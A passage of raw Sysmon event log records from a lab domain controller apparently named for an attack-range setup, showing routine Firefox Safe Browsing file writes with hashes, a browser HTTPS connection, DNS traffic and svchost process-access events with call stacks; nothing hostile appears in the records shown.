Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=5ACD66DB29AFABE23566110E44DBD5E7,SHA256=AD73B565DED09760945E8AC426CD4D16C8DEB3C202E8ABAD356EABF62137D2D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.442{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=3B53A80D80584F5F16860FB04FBBB50C,SHA256=578B167D678436BE970332CB1F2B38D237BBFD6DAF46C2D565F0A457F7C00D6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=F0A0E73AB1563D94300A5FF98A4D4EC8,SHA256=F5523B366C6D20A56064595DB6D6150FA814E3021915E09865FB2F0D8D50B93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001050040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001050039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.404{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=035827BEC3ADE90E76BA3AEDC96358AD,SHA256=4EAF96227DE73BFE63800037F56C081F7F12A7BE5BCC1299A2B87FCDD6BFE7D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=5A35E65CADA1885B6796D1B3FE56E5F8,SHA256=35A1BF0FF6DD2B70DA5F89611891D413808DDE1510D03D788FF48A214AFA7CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=E72E6B0165636DAE364CC43097FCD4E9,SHA256=3FE594D286D351B102E94676FD8A91B8FA0B3FDDD151336DDCE8C9BA2CFCFB50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=318288F5909637E0C3285C0942D72FF4,SHA256=F2BB9D40F7237C0E6D8EA96DFA2E864BD1264EB191C52BDBF16488D9466BC300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.389{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=F7A173C65979416711FAFF47FADFBB44,SHA256=7F018CC32CF471750B6C5322E27E4F1C38097C414E7C6DC6AF9CF31E607431A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=5C71167AC9642FCF7752093F77FBBC89,SHA256=6714F7FBADCCB013DA1D8ECEFA6368A7D193E1F2460477F8AC304EDCF8637AA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=BFED06667174B0D03EE7F88A3DDC9A8C,SHA256=7AE5584755089D28C3A52DCF1EB86E62D4F2E377D61A7D549C6D4EBD53F39B26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=E6AAB64DC2799B4ECC6A6D18F86BD283,SHA256=D72FA31B50E9164371C5B7A3CCA257B99CE12D900FB07DEF942361D76299F5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=16E5F327975AC215E9EFA4A4FC5262F5,SHA256=4698D628493E91E42494C8343B7E6469DFC1BFB1F771258C2FB556E84EF314B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=C3757E7620737B3B6500073B370852FE,SHA256=34B07244F673343E9AC1C775B455C0A60AA95439E83A70B0C6A24E504A88F4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=8D9E3EEEE577DCE4B0062413A081F9F2,SHA256=D0E3356B67A0BB9BD101D87FA6E23EC2699CC8A25564CD88076663DACF73A9CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.373{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=2CC22CF356532158115AB8A0851A9A80,SHA256=6B106FD00C6E27909C9779448E5BDA5FFB96FE2A6FF42636A662AB411D9906DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.357{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=F0A0E73AB1563D94300A5FF98A4D4EC8,SHA256=F5523B366C6D20A56064595DB6D6150FA814E3021915E09865FB2F0D8D50B93E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.342{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.273{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=4A2609D475F48638235EF3C1EE4607CE,SHA256=92D645E1E20A16E63907890C21B99C8AEEBFAA920DA9E7663C43E259886FBAA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.273{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.055{466BC892-3152-60E8-240B-00000000CF01}3328C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-890.attackrange.local51068-false172.217.16.138zrh04s06-in-f138.1e100.net443https 354300x80000000000000001050010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.054{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55941- 23542300x80000000000000001050009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.257{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=33287B256C94A051C011EB4B2777550C,SHA256=FF74549543054CC5BEA457049650367960DA1D6D66566B77E4FFE206F14C1D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050008Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.257{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050007Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.242{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=5AE80998F1A6D08F1791EAD23EDC7405,SHA256=0F8E615DE60E94815B231AA748BE551BE5D060509466CB948A93917C0BF87618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.178{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\axpgvkas.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050005Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.095{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.095{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 